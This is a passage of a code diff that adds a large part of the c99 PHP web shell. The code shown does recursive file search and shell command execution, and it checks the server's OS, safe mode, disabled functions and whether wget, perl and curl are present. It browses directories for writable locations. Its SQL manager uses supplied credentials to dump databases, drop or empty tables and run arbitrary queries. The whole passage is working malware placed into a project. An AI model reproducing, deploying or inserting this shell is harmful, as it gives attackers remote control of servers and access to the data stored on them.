+      global $found_f;
+      global $search_i_f;
+      global $search_i_d;
+      global $a;
+      if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+      $h = opendir($d);
+      while (($f = readdir($h)) !== FALSE) {
+        if($f != "." && $f != "..") {
+          $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+          if (is_dir($d.$f)) {
+            $search_i_d++;
+            if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+            if (!is_link($d.$f)) {c99fsearch($d.$f);}
+          }
+          else {
+            $search_i_f++;
+            if ($bool) {
+              if (!empty($a["text"])) {
+                $r = @file_get_contents($d.$f);
+                if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+                if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+                if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+                else {$bool = strpos(" ".$r,$a["text"],1);}
+                if ($a["text_not"]) {$bool = !$bool;}
+                if ($bool) {$found[] = $d.$f; $found_f++;}
+              }
+              else {$found[] = $d.$f; $found_f++;}
+            }
+          }
+        }
+      }
+      closedir($h);
+    }
+  }
+  if ($act == "gofile") {
+    if (is_dir($f)) { $act = "ls"; $d = $f; }
+    else { $act = "f"; $d = dirname($f); $f = basename($f); }
+  }
+  //Sending Headers
+  @ob_start();
+  @ob_implicit_flush(0);
+  function onphpshutdown() {
+    global $gzipencode,$ft;
+    if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
+      $v = @ob_get_contents();
+      @ob_end_clean();
+      @ob_start("ob_gzHandler");
+      echo $v;
+      @ob_end_flush();
+    }
+  }
+  function c99shexit() {
+    onphpshutdown();
+    exit;
+  }
+  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+  header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+  header("Cache-Control: no-store, no-cache, must-revalidate");
+  header("Cache-Control: post-check=0, pre-check=0", FALSE);
+  header("Pragma: no-cache");
+  //Setting Temporary Dir
+  if (empty($tmpdir)) {
+    $tmpdir = ini_get("upload_tmp_dir");
+    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+  }
+  $tmpdir = realpath($tmpdir);
+  $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+  if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+  if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+  else {$tmpdir_logs = realpath($tmpdir_logs);}
+  //Getting Status
+  function showstat($stat) {
+    if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
+    else { return "<font color=#FF9900><b>OFF</b></font>"; }
+  }
+  function testperl() {
+    if (ex('perl -h')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testfetch() {
+    if(ex('fetch --help')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testwget() {
+    if (ex('wget --help')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testoracle() {
+    if (function_exists('ocilogon')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testpostgresql() {
+    if (function_exists('pg_connect')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testmssql() {
+    if (function_exists('mssql_connect')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testcurl() {
+    if (function_exists('curl_version')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function testmysql() {
+    if (function_exists('mysql_connect')) { return showstat("on"); }
+    else { return showstat("off"); }
+  }
+  function showdisablefunctions() {
+    if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900><b>".$disablefunc."</b></font>"; }
+    else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
+  }
+  //Getting Safe Mode Status
+  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
+    $safemode = TRUE;
+    $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>";
+  }
+  else {
+    $safemode = FALSE;
+    $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF (Not Secure)</b></font>";
+  }
+  $v = @ini_get("open_basedir");
+  if ($v or strtolower($v) == "on") {
+    $openbasedir = TRUE;
+    $hopenbasedir = "<font color=red>".$v."</font>";
+  }
+  else {
+    $openbasedir = FALSE;
+    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
+  }
+  $sort = htmlspecialchars($sort);
+  if (empty($sort)) {$sort = $sort_default;}
+  $sort[1] = strtolower($sort[1]);
+  $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+  if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+  $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+  @ini_set("highlight.bg",$highlight_bg);
+  @ini_set("highlight.comment",$highlight_comment);
+  @ini_set("highlight.default",$highlight_default);
+  @ini_set("highlight.html",$highlight_html);
+  @ini_set("highlight.keyword",$highlight_keyword);
+  @ini_set("highlight.string",$highlight_string);
+  if (!is_array($actbox)) { $actbox = array(); }
+  $dspact = $act = htmlspecialchars($act);
+  $disp_fullpath = $ls_arr = $notls = null;
+  $ud = urlencode($d);
+  //Directory
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (empty($d)) {$d = realpath(".");}
+  elseif(realpath($d)) {$d = realpath($d);}
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $d = str_replace("\\\\","\\",$d);
+  $dispd = htmlspecialchars($d);
+/***** HTML START *****/
+echo $html_start;
+echo "<div class=barheader2><h3>$sh_name</h3>.: No System is Perfectly Safe :.</div>\n";
+echo "<table id=pagebar><tr><td width=50%><p>".
+     "Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."act=phpini>php.ini</a><br>".
+     "$hsafemode<br>".
+     "OS : ".php_uname()."<br>";
+if (!$win) { echo "User ID : ".myshellexec("id"); }
+else { echo "User : " . get_current_user(); }
+echo "</p></td>".
+     "<td width=50%><p>Server IP : <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ".
+     "Your IP : <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>";
+if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
+echo "Freespace : ".disp_freespace($d);
+echo "</p></td></tr>";
+echo "<tr><td colspan=2><p>";
+echo "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql().
+     " cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
+echo "Disabled Functions: ".showdisablefunctions();
+echo "</p></td></tr>";
+echo "<tr><td colspan=2 id=mainmenu>";
+if (count($quicklaunch2) > 0) {
+  foreach($quicklaunch2 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td><tr><td colspan=2 id=mainmenu>";
+if (count($quicklaunch1) > 0) {
+  foreach($quicklaunch1 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td></tr><tr><td colspan=2>";
+echo "<p class=fleft>";
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b) {
+  $t = ""; $j = 0;
+  foreach ($e as $r) {
+    $t.= $r.DIRECTORY_SEPARATOR;
+    if ($j == $i) { break; }
+    $j++;
+  }
+  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
+  $i++;
+}
+echo " - ";
+if (is_writable($d)) {
+  $wd = TRUE;
+  $wdt = "<font color=#00FF00>[OK]</font>";
+  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else {
+  $wd = FALSE;
+  $wdt = "<font color=red>[Read-Only]</font>";
+  echo "<b>".view_perms_color($d)."</b>";
+}
+?>
+</p>
+<div class=fright>
+<form method="POST"><input type=hidden name=act value="ls">
+Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
+</form>
+</div>
+</td></tr></table>
+<?php
+//Information Table
+echo "<table id=maininfo><tr><td width=\"100%\">\n";
+//Action
+if ($act == "") { $act = $dspact = "ls"; }
+if ($act == "phpini" ) { get_phpini(); }
+if ($act == "sql") {
+  $sql_surl = $surl."act=sql";
+  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+  $sql_surl .= "&";
+  echo "<h4>Attention! SQL-Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
+       "<table>".
+       "<tr><td width=\"100%\" colspan=2 class=barheader>";
+  if ($sql_server) {
+    $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+    $err = mysql_smarterror();
+    @mysql_select_db($sql_db,$sql_sock);
+    if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+  }
+  else {$sql_sock = FALSE;}
+  echo ".: SQL Manager :.<br>";
+  if (!$sql_sock) {
+    if (!$sql_server) {echo "NO CONNECTION";}
+    else {echo "Can't connect! ".$err;}
+  }
+  else {
+    $sqlquicklaunch = array();
+    $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+    $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+    $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+    $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+    $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+    $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+    echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
+    if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+  }
+  echo "</td></tr><tr>";
+  if (!$sql_sock) {
+    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
+    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
+  }
+  else {
+    //Start left panel
+    if (!empty($sql_db)) {
+      ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_tables($sql_db);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+        $c = 0;
+        while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+        if (!$c) {echo "No tables found in database.";}
+      }
+    }
+    else {
+      ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_dbs($sql_sock);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
+        <?php
+        $c = 0;
+        $dbs = "";
+        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+        echo "<option value=\"\">Databases (".$c.")</option>";
+        echo $dbs;
+      }
+      ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
+      <?php
+    }
+    //End left panel
+    echo "</td><td width=\"100%\">";
+    //Start center panel
+    $diplay = TRUE;
+    if ($sql_db) {
+      if (!is_numeric($c)) {$c = 0;}
+      if ($c == 0) {$c = "no";}
+      echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+      if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+      echo "</b></center>";
+      $acts = array("","dump");
+      if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+      elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+      elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+      elseif ($sql_tbl_act == "insert") {
+        if ($sql_tbl_insert_radio == 1) {
+          $keys = "";
+          $akeys = array_keys($sql_tbl_insert);
+          foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+          if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+          $values = "";
+          $i = 0;
+          foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+          if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+          $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+        elseif ($sql_tbl_insert_radio == 2) {
+          $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+          $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+          $result = mysql_query($sql_query) or print(mysql_smarterror());
+          $result = mysql_fetch_array($result, MYSQL_ASSOC);
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+      }
+      if ($sql_act == "query") {
+        echo "<hr size=\"1\" noshade>";
+        if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+        if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+        if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+      }
+      if (in_array($sql_act,$acts)) {
+        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="newtbl">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
+        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
+        <input type="text" name="sql_newtbl" size="20">
+        <input type="submit" value="Create">
+        </form></td>
+        <td width="30%" height="1"><b>Dump DB:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="dump">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+        <?php
+        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+        if ($sql_act == "newtbl") {
+          echo "<b>";
+          if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
+            echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+          }
+          else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+        }
+        elseif ($sql_act == "dump") {
+          if (empty($submit)) {
+            $diplay = FALSE;
+            echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+            echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+            $v = join (";",$dmptbls);
+            echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+            if ($dump_file) {$tmp = $dump_file;}
+            else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+            echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+            echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+            echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+            echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+            echo "</form>";
+          }
+          else {
+            $diplay = TRUE;
+            $set = array();
+            $set["sock"] = $sql_sock;
+            $set["db"] = $sql_db;
+            $dump_out = "download";
+            $set["print"] = 0;
+            $set["nl2br"] = 0;
+            $set[""] = 0;
+            $set["file"] = $dump_file;
+            $set["add_drop"] = TRUE;
+            $set["onlytabs"] = array();
+            if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+            $ret = mysql_dump($set);
+            if ($sql_dump_download) {
+              @ob_clean();
+              header("Content-type: application/octet-stream");
+              header("Content-length: ".strlen($ret));
+              header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+              echo $ret;
+              exit;
+            }
+            elseif ($sql_dump_savetofile) {
+              $fp = fopen($sql_dump_file,"w");
+              if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+              else {
+                fwrite($fp,$ret);
+                fclose($fp);
+                echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+              }
+            }
+            else {echo "<b>Dump: nothing to do!</b>";}
+          }
+        }
+        if ($diplay) {
+    if (!empty($sql_tbl)) {
+      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+      $count_row = mysql_fetch_array($count);
+      mysql_free_result($count);
+      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+      $tbl_struct_fields = array();
+      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+      $perpage = $sql_tbl_le - $sql_tbl_ls;
+      if (!is_numeric($perpage)) {$perpage = 10;}
+      $numpages = $count_row[0]/$perpage;
+      $e = explode(" ",$sql_order);
+      if (count($e) == 2) {
+        if ($e[0] == "d") {$asc_desc = "DESC";}
+        else {$asc_desc = "ASC";}
+        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+      }
+      else {$v = "";}
+      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+      $result = mysql_query($query) or print(mysql_smarterror());
+      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+      if ($sql_tbl_act == "insert") {
+        if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+        if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
+        else {
+          echo "<br><br><b>Inserting row into table:</b><br>";
+          if (!empty($sql_tbl_insert_q)) {
+            $sql_query = "SELECT * FROM `".$sql_tbl."`";
+            $sql_query .= " WHERE".$sql_tbl_insert_q;
+            $sql_query .= " LIMIT 1;";
+            $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+            $values = mysql_fetch_assoc($result);
+            mysql_free_result($result);
+          }
+          else {$values = array();}
+          echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+          foreach ($tbl_struct_fields as $field) {
+            $name = $field["Field"];
+            if (empty($sql_tbl_insert_q)) {$v = "";}
